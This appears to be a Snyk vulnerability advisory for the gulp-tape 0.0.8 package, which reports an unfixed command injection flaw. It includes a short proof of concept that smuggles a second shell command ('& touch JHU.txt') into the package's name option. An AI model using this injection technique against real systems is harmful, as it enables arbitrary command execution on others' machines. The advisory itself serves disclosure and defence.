gulp-tape@0.0.8 vulnerabilities

Run Tape tests in Gulp.

Direct Vulnerabilities

Known vulnerabilities in the gulp-tape package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • M
Command Injection

gulp-tape is a to run Tape tests in Gulp.

Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbitrary commands as part of gulp-tape options.

PoC

var root = require("gulp-tape");
var gulp = require("gulp");
var options = {
  name: "& touch JHU.txt"
}
gulp.src("./gulp-tape.js")
  .pipe(root(options));

How to fix Command Injection?

There is no fixed version for gulp-tape.

*